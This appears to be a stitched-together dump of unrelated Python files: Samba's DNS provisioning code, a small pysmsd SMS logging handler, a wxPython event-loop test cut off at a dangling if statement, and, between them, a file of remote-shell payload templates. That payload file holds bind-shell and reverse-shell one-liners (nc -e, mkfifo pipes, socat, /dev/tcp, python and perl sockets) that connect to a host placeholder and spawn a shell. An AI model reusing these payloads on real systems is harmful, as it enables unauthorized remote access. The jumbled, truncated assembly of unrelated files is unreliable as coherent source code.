    # CNAME from the NTDS GUID to this host.
    add_cname_record(samdb, forest_container_dn, "DC=%s" % ntdsguid,
                     fqdn_hostname)
def secretsdb_setup_dns(secretsdb, names, private_dir, realm,
                        dnsdomain, dns_keytab_path, dnspass, key_version_number):
    """Add DNS specific bits to a secrets database.

    :param secretsdb: Ldb Handle to the secrets database
    :param names: Names shortcut (names.hostname and names.netbiosname are
        used below)
    :param private_dir: path of the private directory holding the keytab
    :param realm: Kerberos realm name
    :param dnsdomain: DNS domain name
    :param dns_keytab_path: DNS keytab path, relative to private_dir
    :param dnspass: DNS account secret; stored base64-encoded as DNSPASS_B64
    :param key_version_number: Kerberos key version number; defaults to 1
        when None
    """
    # Remove any stale keytab first so a fresh one is exported from the
    # newly stored secret; a missing file is fine.
    try:
        os.unlink(os.path.join(private_dir, dns_keytab_path))
    except OSError:
        pass
    if key_version_number is None:
        key_version_number = 1
    # Substitute the values into secrets_dns.ldif and apply it.
    setup_ldb(secretsdb, setup_path("secrets_dns.ldif"), {
            "REALM": realm,
            "DNSDOMAIN": dnsdomain,
            "DNS_KEYTAB": dns_keytab_path,
            "DNSPASS_B64": b64encode(dnspass.encode('utf-8')),
            "KEY_VERSION_NUMBER": str(key_version_number),
            "HOSTNAME": names.hostname,
            "DNSNAME" : '%s.%s' % (
                names.netbiosname.lower(), names.dnsdomain.lower())
            })
def create_dns_dir(logger, paths):
    """Create a fresh, empty directory to hold the BIND DNS files.

    Any existing tree at the location is removed first.

    :param logger: Logger object
    :param paths: paths object (paths.dns and paths.bind_gid are used)
    """
    dns_dir = os.path.dirname(paths.dns)
    # Wipe whatever was there before; second arg True = ignore_errors.
    try:
        shutil.rmtree(dns_dir, True)
    except OSError:
        pass
    os.mkdir(dns_dir, 0770)
    if paths.bind_gid is not None:
        try:
            # Hand the directory to the BIND group so named can read it.
            os.chown(dns_dir, -1, paths.bind_gid)
            # chmod needed to cope with umask
            os.chmod(dns_dir, 0770)
        except OSError:
            # chown normally fails when not running as root; under selftest
            # (SAMBA_SELFTEST set) that is expected, so stay quiet there.
            if not os.environ.has_key('SAMBA_SELFTEST'):
                logger.error("Failed to chown %s to bind gid %u" % (
                    dns_dir, paths.bind_gid))
def create_zone_file(lp, logger, paths, targetdir, dnsdomain,
                     hostip, hostip6, hostname, realm, domainguid,
                     ntdsguid, site):
    """Write out a DNS zone file, from the info in the current database.

    :param lp: Loadparm context ("rndc command" and "realm" are read below)
    :param logger: Logger object
    :param paths: paths object
    :param targetdir: target directory; None means a live install, in which
        case the zone is frozen/thawed around the rewrite via rndc
    :param dnsdomain: DNS Domain name
    :param hostip: Local IPv4 IP
    :param hostip6: Local IPv6 IP
    :param hostname: Local hostname
    :param realm: Realm name
    :param domainguid: GUID of the domain.
    :param ntdsguid: GUID of the hosts nTDSDSA record.
    :param site: site name used in the generated SRV records
    """
    assert isinstance(domainguid, str)
    # Pre-compute the optional AAAA template lines; empty strings simply
    # drop them from the rendered zone file.
    if hostip6 is not None:
        hostip6_base_line = " IN AAAA " + hostip6
        hostip6_host_line = hostname + " IN AAAA " + hostip6
        gc_msdcs_ip6_line = "gc._msdcs IN AAAA " + hostip6
    else:
        hostip6_base_line = ""
        hostip6_host_line = ""
        gc_msdcs_ip6_line = ""
    # Likewise for the optional IPv4 A lines.
    if hostip is not None:
        hostip_base_line = " IN A " + hostip
        hostip_host_line = hostname + " IN A " + hostip
        gc_msdcs_ip_line = "gc._msdcs IN A " + hostip
    else:
        hostip_base_line = ""
        hostip_host_line = ""
        gc_msdcs_ip_line = ""
    # we need to freeze the zone while we update the contents
    if targetdir is None:
        rndc = ' '.join(lp.get("rndc command"))
        os.system(rndc + " freeze " + lp.get("realm"))
    # Render provision.zone with the computed substitutions.
    setup_file(setup_path("provision.zone"), paths.dns, {
            "HOSTNAME": hostname,
            "DNSDOMAIN": dnsdomain,
            "REALM": realm,
            "HOSTIP_BASE_LINE": hostip_base_line,
            "HOSTIP_HOST_LINE": hostip_host_line,
            "DOMAINGUID": domainguid,
            "DATESTRING": time.strftime("%Y%m%d%H"),
            "DEFAULTSITE": site,
            "NTDSGUID": ntdsguid,
            "HOSTIP6_BASE_LINE": hostip6_base_line,
            "HOSTIP6_HOST_LINE": hostip6_host_line,
            "GC_MSDCS_IP_LINE": gc_msdcs_ip_line,
            "GC_MSDCS_IP6_LINE": gc_msdcs_ip6_line,
        })
    if paths.bind_gid is not None:
        try:
            # Hand the zone file to the BIND group so named can read it.
            os.chown(paths.dns, -1, paths.bind_gid)
            # chmod needed to cope with umask
            os.chmod(paths.dns, 0664)
        except OSError:
            # chown normally fails when not running as root; under selftest
            # (SAMBA_SELFTEST set) that is expected, so stay quiet there.
            if not os.environ.has_key('SAMBA_SELFTEST'):
                logger.error("Failed to chown %s to bind gid %u" % (
                    paths.dns, paths.bind_gid))
    # Thaw the zone again on a live install (rndc was set above in the
    # same targetdir-is-None branch).
    if targetdir is None:
        os.system(rndc + " unfreeze " + lp.get("realm"))
def create_samdb_copy(samdb, logger, paths, names, domainsid, domainguid):
    """Create a copy of samdb and give write permissions to named for dns partitions

    The copy lives next to paths.dns.  The DNS partitions and metadata.tdb
    are hard-linked (shared with the live database); the domain partition is
    replaced by an empty stub so secret data (e.g. the krbtgt key) is never
    exposed to BIND; all remaining partitions are copied.

    :param samdb: LDB object connected to sam.ldb
    :param logger: Logger object
    :param paths: paths object (private_dir, dns, bind_gid)
    :param names: provision names shortcut (domaindn, rootdn)
    :param domainsid: Domain SID (dom_sid object)
    :param domainguid: GUID of the domain, as a string
    """
    private_dir = paths.private_dir
    samldb_dir = os.path.join(private_dir, "sam.ldb.d")
    dns_dir = os.path.dirname(paths.dns)
    dns_samldb_dir = os.path.join(dns_dir, "sam.ldb.d")
    # Find the partitions and corresponding filenames
    partfile = {}
    res = samdb.search(base="@PARTITION", scope=ldb.SCOPE_BASE, attrs=["partition"])
    for tmp in res[0]["partition"]:
        # Each value has the form "<partition NC>:<filename>".
        (nc, fname) = tmp.split(':')
        partfile[nc.upper()] = fname
    # Create empty domain partition
    domaindn = names.domaindn.upper()
    domainpart_file = os.path.join(dns_dir, partfile[domaindn])
    try:
        os.mkdir(dns_samldb_dir)
        file(domainpart_file, 'w').close()
        # Fill the basedn and @OPTION records in domain partition
        dom_ldb = samba.Ldb(domainpart_file)
        domainguid_line = "objectGUID: %s\n-" % domainguid
        descr = b64encode(get_domain_descriptor(domainsid))
        setup_add_ldif(dom_ldb, setup_path("provision_basedn.ldif"), {
            "DOMAINDN" : names.domaindn,
            "DOMAINGUID" : domainguid_line,
            "DOMAINSID" : str(domainsid),
            "DESCRIPTOR" : descr})
        setup_add_ldif(dom_ldb,
            setup_path("provision_basedn_options.ldif"), None)
    except:
        logger.error(
            "Failed to setup database for BIND, AD based DNS cannot be used")
        raise
    # This line is critical to the security of the whole scheme.
    # We assume there is no secret data in the (to be left out of
    # date and essentially read-only) config, schema and metadata partitions.
    #
    # Only the stub of the domain partition is created above.
    #
    # That way, things like the krbtgt key do not leak.
    del partfile[domaindn]
    # Link dns partitions and metadata
    domainzonedn = "DC=DOMAINDNSZONES,%s" % names.domaindn.upper()
    forestzonedn = "DC=FORESTDNSZONES,%s" % names.rootdn.upper()
    domainzone_file = partfile[domainzonedn]
    forestzone_file = partfile.get(forestzonedn)
    metadata_file = "metadata.tdb"
    try:
        # Hard links: the DNS partitions stay shared with the live samdb so
        # named and samba see the same records.
        os.link(os.path.join(samldb_dir, metadata_file),
                os.path.join(dns_samldb_dir, metadata_file))
        os.link(os.path.join(private_dir, domainzone_file),
                os.path.join(dns_dir, domainzone_file))
        if forestzone_file:
            os.link(os.path.join(private_dir, forestzone_file),
                    os.path.join(dns_dir, forestzone_file))
    except OSError:
        logger.error(
            "Failed to setup database for BIND, AD based DNS cannot be used")
        raise
    del partfile[domainzonedn]
    if forestzone_file:
        del partfile[forestzonedn]
    # Copy root, config, schema partitions (and any other if any)
    # Since samdb is open in the current process, copy them in a child process
    try:
        tdb_copy(os.path.join(private_dir, "sam.ldb"),
                 os.path.join(dns_dir, "sam.ldb"))
        for nc in partfile:
            pfile = partfile[nc]
            tdb_copy(os.path.join(private_dir, pfile),
                     os.path.join(dns_dir, pfile))
    except:
        logger.error(
            "Failed to setup database for BIND, AD based DNS cannot be used")
        raise
    # Give bind read/write permissions dns partitions
    if paths.bind_gid is not None:
        try:
            os.chown(samldb_dir, -1, paths.bind_gid)
            os.chmod(samldb_dir, 0750)
            for dirname, dirs, files in os.walk(dns_dir):
                for d in dirs:
                    dpath = os.path.join(dirname, d)
                    os.chown(dpath, -1, paths.bind_gid)
                    os.chmod(dpath, 0770)
                for f in files:
                    if f.endswith('.ldb') or f.endswith('.tdb'):
                        fpath = os.path.join(dirname, f)
                        os.chown(fpath, -1, paths.bind_gid)
                        os.chmod(fpath, 0660)
        except OSError:
            if not os.environ.has_key('SAMBA_SELFTEST'):
                logger.error(
                    "Failed to set permissions to sam.ldb* files, fix manually")
    else:
        if not os.environ.has_key('SAMBA_SELFTEST'):
            logger.warning("""Unable to find group id for BIND,
                set permissions to sam.ldb* files manually""")
def create_dns_update_list(lp, logger, paths):
    """Write out the dns_update_list and spn_update_list files.

    No variable substitution is performed on these files here; substitution
    is done at runtime by samba_dnsupdate and samba_spnupdate.
    """
    targets = (
        ("dns_update_list", paths.dns_update_list),
        ("spn_update_list", paths.spn_update_list),
    )
    for template_name, destination in targets:
        setup_file(setup_path(template_name), destination, None)
def create_named_conf(paths, realm, dnsdomain, dns_backend, logger):
    """Write out a file containing zone statements suitable for inclusion in a
    named.conf file (including GSS-TSIG configuration).

    :param paths: all paths
    :param realm: Realm name
    :param dnsdomain: DNS Domain name
    :param dns_backend: DNS backend type (BIND9_FLATFILE or BIND9_DLZ)
    :param logger: Logger object
    """
    # TODO: This really should have been done as a top level import.
    # It is done here to avoid a depencency loop. That is, we move
    # ProvisioningError to another file, and have all the provision
    # scripts import it from there.
    from samba.provision import ProvisioningError
    if dns_backend == "BIND9_FLATFILE":
        setup_file(setup_path("named.conf"), paths.namedconf, {
                    "DNSDOMAIN": dnsdomain,
                    "REALM": realm,
                    "ZONE_FILE": paths.dns,
                    "REALM_WC": "*." + ".".join(realm.split(".")[1:]),
                    "NAMED_CONF": paths.namedconf,
                    "NAMED_CONF_UPDATE": paths.namedconf_update
                    })
        # NOTE(review): called without a substitution dict — assumes
        # setup_file's third argument defaults to None; confirm signature.
        setup_file(setup_path("named.conf.update"), paths.namedconf_update)
    elif dns_backend == "BIND9_DLZ":
        # Sniff the installed BIND version from `named -V` so we can
        # uncomment the matching dlz module line in the template.
        bind_info = subprocess.Popen(['named -V'], shell=True,
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT,
                                     cwd='.').communicate()[0]
        # '#' leaves a template line commented out; '' activates it.
        bind9_8 = '#'
        bind9_9 = '#'
        bind9_10 = '#'
        bind9_11 = '#'
        if bind_info.upper().find('BIND 9.8') != -1:
            bind9_8 = ''
        elif bind_info.upper().find('BIND 9.9') != -1:
            bind9_9 = ''
        elif bind_info.upper().find('BIND 9.10') != -1:
            bind9_10 = ''
        elif bind_info.upper().find('BIND 9.11') != -1:
            bind9_11 = ''
        elif bind_info.upper().find('BIND 9.7') != -1:
            # The DLZ plugin interface is not available for 9.7.
            raise ProvisioningError("DLZ option incompatible with BIND 9.7.")
        else:
            logger.warning("BIND version unknown, please modify %s manually." % paths.namedconf)
        setup_file(setup_path("named.conf.dlz"), paths.namedconf, {
                    "NAMED_CONF": paths.namedconf,
                    "MODULESDIR" : samba.param.modules_dir(),
                    "BIND9_8" : bind9_8,
                    "BIND9_9" : bind9_9,
                    "BIND9_10" : bind9_10,
                    "BIND9_11" : bind9_11
                    })
def create_named_txt(path, realm, dnsdomain, dnsname, private_dir,
                     keytab_name):
    """Write out a named.txt file with further BIND configuration
    documentation (including GSS-TSIG keytab details) for the administrator.

    :param path: Path of the new named.txt file.
    :param realm: Realm name
    :param dnsdomain: DNS Domain name
    :param dnsname: Fully qualified DNS name of this host
    :param private_dir: Path to private directory
    :param keytab_name: File name of DNS keytab file
    """
    setup_file(setup_path("named.txt"), path, {
            "DNSDOMAIN": dnsdomain,
            "DNSNAME" : dnsname,
            "REALM": realm,
            "DNS_KEYTAB": keytab_name,
            "DNS_KEYTAB_ABS": os.path.join(private_dir, keytab_name),
            "PRIVATE_DIR": private_dir
        })
def is_valid_dns_backend(dns_backend):
    """Return True if *dns_backend* names a supported DNS backend."""
    supported_backends = ("BIND9_FLATFILE", "BIND9_DLZ", "SAMBA_INTERNAL", "NONE")
    return dns_backend in supported_backends
def is_valid_os_level(os_level):
    """Return True if *os_level* is a supported domain functional level."""
    return (os_level >= DS_DOMAIN_FUNCTION_2000
            and os_level <= DS_DOMAIN_FUNCTION_2012_R2)
def create_dns_legacy(samdb, domainsid, forestdn, dnsadmins_sid):
    """Create the legacy CN=MicrosoftDNS,CN=System container with root hints.

    :param samdb: LDB object connected to sam.ldb
    :param domainsid: Domain SID (dom_sid object)
    :param forestdn: DN under which CN=System lives
    :param dnsadmins_sid: SID of the DnsAdmins group
    """
    # Set up MicrosoftDNS container
    add_dns_container(samdb, forestdn, "CN=System", domainsid, dnsadmins_sid)
    # Add root servers
    add_rootservers(samdb, forestdn, "CN=System")
def fill_dns_data_legacy(samdb, domainsid, forestdn, dnsdomain, site, hostname,
                         hostip, hostip6, dnsadmins_sid):
    """Populate the legacy CN=MicrosoftDNS,CN=System partition with the
    domain zone and this DC's records.

    :param samdb: LDB object connected to sam.ldb
    :param domainsid: Domain SID (dom_sid object)
    :param forestdn: DN under which CN=System lives
    :param dnsdomain: DNS name of the domain
    :param site: Site name used for the DC records
    :param hostname: Host name of this DC
    :param hostip: IPv4 address (or None)
    :param hostip6: IPv6 address (or None)
    :param dnsadmins_sid: SID of the DnsAdmins group
    """
    # Add domain record
    add_domain_record(samdb, forestdn, "CN=System", dnsdomain, domainsid,
                      dnsadmins_sid)
    # Add DNS records for a DC in domain
    add_dc_domain_records(samdb, forestdn, "CN=System", site, dnsdomain,
                          hostname, hostip, hostip6)
def create_dns_partitions(samdb, domainsid, names, domaindn, forestdn,
                          dnsadmins_sid, fill_level):
    """Create the DNS application partitions and their MicrosoftDNS containers.

    :param samdb: LDB object connected to sam.ldb
    :param domainsid: Domain SID (dom_sid object)
    :param names: provision names shortcut (configdn, serverdn)
    :param domaindn: DN of the domain
    :param forestdn: DN of the forest root
    :param dnsadmins_sid: SID of the DnsAdmins group
    :param fill_level: provision fill level; for FILL_SUBDOMAIN the forest
        partition already exists, so only the domain container is created
    """
    # Set up additional partitions (DomainDnsZones, ForestDnsZones)
    setup_dns_partitions(samdb, domainsid, domaindn, forestdn,
                        names.configdn, names.serverdn, fill_level)
    # Set up MicrosoftDNS containers
    add_dns_container(samdb, domaindn, "DC=DomainDnsZones", domainsid,
                      dnsadmins_sid)
    if fill_level != FILL_SUBDOMAIN:
        add_dns_container(samdb, forestdn, "DC=ForestDnsZones", domainsid,
                          dnsadmins_sid, forest=True)
def fill_dns_data_partitions(samdb, domainsid, site, domaindn, forestdn,
                             dnsdomain, dnsforest, hostname, hostip, hostip6,
                             domainguid, ntdsguid, dnsadmins_sid, autofill=True,
                             fill_level=FILL_FULL):
    """Fill data in various AD partitions

    :param samdb: LDB object connected to sam.ldb file
    :param domainsid: Domain SID (as dom_sid object)
    :param site: Site name to create hostnames in
    :param domaindn: DN of the domain
    :param forestdn: DN of the forest
    :param dnsdomain: DNS name of the domain
    :param dnsforest: DNS name of the forest
    :param hostname: Host name of this DC
    :param hostip: IPv4 addresses
    :param hostip6: IPv6 addresses
    :param domainguid: Domain GUID
    :param ntdsguid: NTDS GUID
    :param dnsadmins_sid: SID for DnsAdmins group
    :param autofill: Create DNS records (using fixed template)
    :param fill_level: provision fill level; for FILL_SUBDOMAIN the forest
        partition is left untouched
    """
    ##### Set up DC=DomainDnsZones,<DOMAINDN>
    # Add rootserver records
    add_rootservers(samdb, domaindn, "DC=DomainDnsZones")
    # Add domain record
    add_domain_record(samdb, domaindn, "DC=DomainDnsZones", dnsdomain,
                      domainsid, dnsadmins_sid)
    # Add DNS records for a DC in domain
    if autofill:
        add_dc_domain_records(samdb, domaindn, "DC=DomainDnsZones", site,
                              dnsdomain, hostname, hostip, hostip6)
    if fill_level != FILL_SUBDOMAIN:
        ##### Set up DC=ForestDnsZones,<FORESTDN>
        # Add _msdcs record
        add_msdcs_record(samdb, forestdn, "DC=ForestDnsZones", dnsforest)
        # Add DNS records for a DC in forest
        if autofill:
            add_dc_msdcs_records(samdb, forestdn, "DC=ForestDnsZones", site,
                                 dnsforest, hostname, hostip, hostip6,
                                 domainguid, ntdsguid)
def setup_ad_dns(samdb, secretsdb, names, paths, lp, logger,
        dns_backend, os_level, dnspass=None, hostip=None, hostip6=None,
        targetdir=None, fill_level=FILL_FULL):
    """Provision DNS information (assuming GC role)

    :param samdb: LDB object connected to sam.ldb file
    :param secretsdb: LDB object connected to secrets.ldb file
    :param names: Names shortcut
    :param paths: Paths shortcut
    :param lp: Loadparm object
    :param logger: Logger object
    :param dns_backend: Type of DNS backend
    :param os_level: Functional level (treated as os level)
    :param dnspass: Password for bind's DNS account
    :param hostip: IPv4 address
    :param hostip6: IPv6 address
    :param targetdir: Target directory for creating DNS-related files for BIND9
    :param fill_level: provision fill level, passed through to the partition
        creation/population helpers
    """
    if not is_valid_dns_backend(dns_backend):
        raise Exception("Invalid dns backend: %r" % dns_backend)
    if not is_valid_os_level(os_level):
        raise Exception("Invalid os level: %r" % os_level)
    if dns_backend == "NONE":
        logger.info("No DNS backend set, not configuring DNS")
        return
    # Add dns accounts (DnsAdmins, DnsUpdateProxy) in domain
    logger.info("Adding DNS accounts")
    add_dns_accounts(samdb, names.domaindn)
    # If dns_backend is BIND9_FLATFILE
    #   Populate only CN=MicrosoftDNS,CN=System,<DOMAINDN>
    #
    # If dns_backend is SAMBA_INTERNAL or BIND9_DLZ
    #   Populate DNS partitions
    # If os_level < 2003 (DS_DOMAIN_FUNCTION_2000)
    #   All dns records are in CN=MicrosoftDNS,CN=System,<DOMAINDN>
    #
    # If os_level >= 2003 (DS_DOMAIN_FUNCTION_2003, DS_DOMAIN_FUNCTION_2008,
    #                        DS_DOMAIN_FUNCTION_2008_R2)
    #   Root server records are in CN=MicrosoftDNS,CN=System,<DOMAINDN>
    #   Domain records are in CN=MicrosoftDNS,CN=System,<DOMAINDN>
    #   Domain records are in CN=MicrosoftDNS,DC=DomainDnsZones,<DOMAINDN>
    #   Forest records are in CN=MicrosoftDNS,DC=ForestDnsZones,<FORESTDN>
    domaindn = names.domaindn
    forestdn = samdb.get_root_basedn().get_linearized()
    dnsdomain = names.dnsdomain.lower()
    dnsforest = dnsdomain
    site = names.sitename
    hostname = names.netbiosname.lower()
    dnsadmins_sid = get_dnsadmins_sid(samdb, domaindn)
    domainguid = get_domainguid(samdb, domaindn)
    # All directory changes happen in a single transaction so a failure
    # leaves the database untouched.
    samdb.transaction_start()
    try:
        # Create CN=System
        logger.info("Creating CN=MicrosoftDNS,CN=System,%s" % domaindn)
        create_dns_legacy(samdb, names.domainsid, domaindn, dnsadmins_sid)
        if os_level == DS_DOMAIN_FUNCTION_2000:
            # Populating legacy dns
            logger.info("Populating CN=MicrosoftDNS,CN=System,%s" % domaindn)
            fill_dns_data_legacy(samdb, names.domainsid, domaindn, dnsdomain, site,
                                 hostname, hostip, hostip6, dnsadmins_sid)
        elif dns_backend in ("SAMBA_INTERNAL", "BIND9_DLZ") and \
                os_level >= DS_DOMAIN_FUNCTION_2003:
            # Create DNS partitions
            logger.info("Creating DomainDnsZones and ForestDnsZones partitions")
            create_dns_partitions(samdb, names.domainsid, names, domaindn, forestdn,
                                  dnsadmins_sid, fill_level)
            # Populating dns partitions
            logger.info("Populating DomainDnsZones and ForestDnsZones partitions")
            fill_dns_data_partitions(samdb, names.domainsid, site, domaindn, forestdn,
                                     dnsdomain, dnsforest, hostname, hostip, hostip6,
                                     domainguid, names.ntdsguid, dnsadmins_sid,
                                     fill_level=fill_level)
    except:
        samdb.transaction_cancel()
        raise
    else:
        samdb.transaction_commit()
    # BIND backends also need flat files / database copies on disk.
    if dns_backend.startswith("BIND9_"):
        setup_bind9_dns(samdb, secretsdb, names, paths, lp, logger,
            dns_backend, os_level, site=site, dnspass=dnspass, hostip=hostip,
            hostip6=hostip6, targetdir=targetdir)
def setup_bind9_dns(samdb, secretsdb, names, paths, lp, logger,
        dns_backend, os_level, site=None, dnspass=None, hostip=None,
        hostip6=None, targetdir=None, key_version_number=None):
    """Provision DNS information (assuming BIND9 backend in DC role)

    :param samdb: LDB object connected to sam.ldb file
    :param secretsdb: LDB object connected to secrets.ldb file
    :param names: Names shortcut
    :param paths: Paths shortcut
    :param lp: Loadparm object
    :param logger: Logger object
    :param dns_backend: Type of DNS backend
    :param os_level: Functional level (treated as os level)
    :param site: Site to create hostnames in
    :param dnspass: Password for bind's DNS account
    :param hostip: IPv4 address
    :param hostip6: IPv6 address
    :param targetdir: Target directory for creating DNS-related files for BIND9
    :param key_version_number: Key version number for the DNS keytab entry
    """
    if (not is_valid_dns_backend(dns_backend) or
        not dns_backend.startswith("BIND9_")):
        raise Exception("Invalid dns backend: %r" % dns_backend)
    if not is_valid_os_level(os_level):
        raise Exception("Invalid os level: %r" % os_level)
    domaindn = names.domaindn
    domainguid = get_domainguid(samdb, domaindn)
    # Record the DNS account credentials / keytab in secrets.ldb.
    secretsdb_setup_dns(secretsdb, names,
                        paths.private_dir, realm=names.realm,
                        dnsdomain=names.dnsdomain,
                        dns_keytab_path=paths.dns_keytab, dnspass=dnspass,
                        key_version_number=key_version_number)
    dns_keytab_path = os.path.join(paths.private_dir, paths.dns_keytab)
    # Make the keytab readable by the bind daemon's group, if known.
    if os.path.isfile(dns_keytab_path) and paths.bind_gid is not None:
        try:
            os.chmod(dns_keytab_path, 0640)
            os.chown(dns_keytab_path, -1, paths.bind_gid)
        except OSError:
            if not os.environ.has_key('SAMBA_SELFTEST'):
                logger.info("Failed to chown %s to bind gid %u",
                            dns_keytab_path, paths.bind_gid)
    create_dns_dir(logger, paths)
    if dns_backend == "BIND9_FLATFILE":
        create_zone_file(lp, logger, paths, targetdir, site=site,
                         dnsdomain=names.dnsdomain, hostip=hostip,
                         hostip6=hostip6, hostname=names.hostname,
                         realm=names.realm, domainguid=domainguid,
                         ntdsguid=names.ntdsguid)
    if dns_backend == "BIND9_DLZ" and os_level >= DS_DOMAIN_FUNCTION_2003:
        create_samdb_copy(samdb, logger, paths, names, names.domainsid, domainguid)
    create_named_conf(paths, realm=names.realm,
                      dnsdomain=names.dnsdomain, dns_backend=dns_backend,
                      logger=logger)
    create_named_txt(paths.namedtxt,
                     realm=names.realm, dnsdomain=names.dnsdomain,
                     dnsname = "%s.%s" % (names.hostname, names.dnsdomain),
                     private_dir=paths.private_dir,
                     keytab_name=paths.dns_keytab)
    logger.info("See %s for an example configuration include file for BIND",
                paths.namedconf)
    logger.info("and %s for further documentation required for secure DNS "
                "updates", paths.namedtxt)
| freenas/samba | python/samba/provision/sambadns.py | Python | gpl-3.0 | 46,997 |
#
# pysmsd.handler.print_handler.py
#
# Copyright 2010 Helsinki Institute for Information Technology
# and the authors.
#
# Authors: Jani Turunen <jani.turunen@hiit.fi>
# Konrad Markus <konrad.markus@hiit.fi>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import logging
from pysmsd.handlers import BaseSMSHandler
from pysmsd.db import db
class Handler(BaseSMSHandler):
    """SMS handler that logs each incoming message at INFO level."""

    def handle(self, db_path, id):
        """Fetch the incoming message with the given *id* and log it.

        :param db_path: path to the message database
        :param id: primary key of the incoming message
        """
        message = db.get_in_message(db_path, id)
        logging.info(message)
| sizzlelab/pysmsd | pysmsd/handlers/print_handler.py | Python | mit | 1,500 |
# Template used to verify command execution: echoes a marker string
# (%(s1)s) that the caller can look for in the response.
echo = """echo '%(s1)s'"""
# Bind-shell payload templates.  Placeholders: %(port)s is the TCP port to
# listen on, %(shell)s the shell binary to expose.  Multiple variants are
# tried because targets differ in which tools (python, nc, mkfifo, socat)
# are available.
bind_shell = [
    """python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", %(port)s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("%(shell)s");s.close()'""",
    """nc -l -p %(port)s -e %(shell)s""",
    """rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc -l %(port)s >/tmp/f; rm -rf /tmp/f""",
    """socat tcp-l:%(port)s exec:%(shell)s"""
]
# Reverse-shell payload templates.  Placeholders: %(host)s/%(port)s are the
# listener to connect back to, %(shell)s the shell to spawn.  The leading
# `sleep 1` gives the local listener time to start accepting.
reverse_shell = [
    """sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc %(host)s %(port)s >/tmp/f""",
    """sleep 1; nc -e %(shell)s %(host)s %(port)s""",
    """sleep 1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["%(shell)s","-i"]);'""",
    "sleep 1; /bin/bash -c \'%(shell)s 0</dev/tcp/%(host)s/%(port)s 1>&0 2>&0\'",
    """perl -e 'use Socket;$i="%(host)s";$p=%(port)s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("%(shell)s -i");};'""",
    # TODO: ruby payload's broken, fix it.
    # """ruby -rsocket -e'f=TCPSocket.open("%(host)s",%(port)s).to_i;exec sprintf("%(shell)s -i <&%%d >&%%d 2>&%%d",f,f,f)'""",
    """sleep 1; python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("%(shell)s");'""",
]
#!/usr/bin/env python
"""
A Simple wx example to test PyDev's event loop integration.
To run this:
1) Enable the PyDev GUI event loop integration for wx
2) do an execfile on this script
3) ensure you have a working GUI simultaneously with an
interactive console
Ref: Modified from wxPython source code wxPython/samples/simple/simple.py
"""
if __name__ == '__main__':
import wx
    class MyFrame(wx.Frame):
        """
        This is MyFrame. It just shows a few controls on a wxPanel,
        and has a simple menu.
        """
        def __init__(self, parent, title):
            wx.Frame.__init__(self, parent, -1, title,
                              pos=(150, 150), size=(350, 200))
            # Create the menubar
            menuBar = wx.MenuBar()
            # and a menu
            menu = wx.Menu()
            # add an item to the menu, using \tKeyName automatically
            # creates an accelerator, the third param is some help text
            # that will show up in the statusbar
            menu.Append(wx.ID_EXIT, "E&xit\tAlt-X", "Exit this simple sample")
            # bind the menu event to an event handler
            self.Bind(wx.EVT_MENU, self.OnTimeToClose, id=wx.ID_EXIT)
            # and put the menu on the menubar
            menuBar.Append(menu, "&File")
            self.SetMenuBar(menuBar)
            self.CreateStatusBar()
            # Now create the Panel to put the other controls on.
            panel = wx.Panel(self)
            # and a few controls
            text = wx.StaticText(panel, -1, "Hello World!")
            text.SetFont(wx.Font(14, wx.SWISS, wx.NORMAL, wx.BOLD))
            text.SetSize(text.GetBestSize())
            btn = wx.Button(panel, -1, "Close")
            funbtn = wx.Button(panel, -1, "Just for fun...")
            # bind the button events to handlers
            self.Bind(wx.EVT_BUTTON, self.OnTimeToClose, btn)
            self.Bind(wx.EVT_BUTTON, self.OnFunButton, funbtn)
            # Use a sizer to layout the controls, stacked vertically and with
            # a 10 pixel border around each
            sizer = wx.BoxSizer(wx.VERTICAL)
            sizer.Add(text, 0, wx.ALL, 10)
            sizer.Add(btn, 0, wx.ALL, 10)
            sizer.Add(funbtn, 0, wx.ALL, 10)
            panel.SetSizer(sizer)
            panel.Layout()
        def OnTimeToClose(self, evt):
            """Event handler for the Close button and the Exit menu item."""
            print("See ya later!")
            self.Close()
        def OnFunButton(self, evt):
            """Event handler for the 'Just for fun...' button click."""
            print("Having fun yet?")
    class MyApp(wx.App):
        def OnInit(self):
            """Called by wx on application startup: create and show the frame."""
            frame = MyFrame(None, "Simple wxPython App")
            self.SetTopWindow(frame)
            print("Print statements go to this stdout window by default.")
            frame.Show(True)
            return True
    # NOTE(review): this inner guard is redundant — this code already sits
    # inside the module-level `if __name__ == '__main__':` block, so the
    # condition is always true here.
    if __name__ == '__main__':
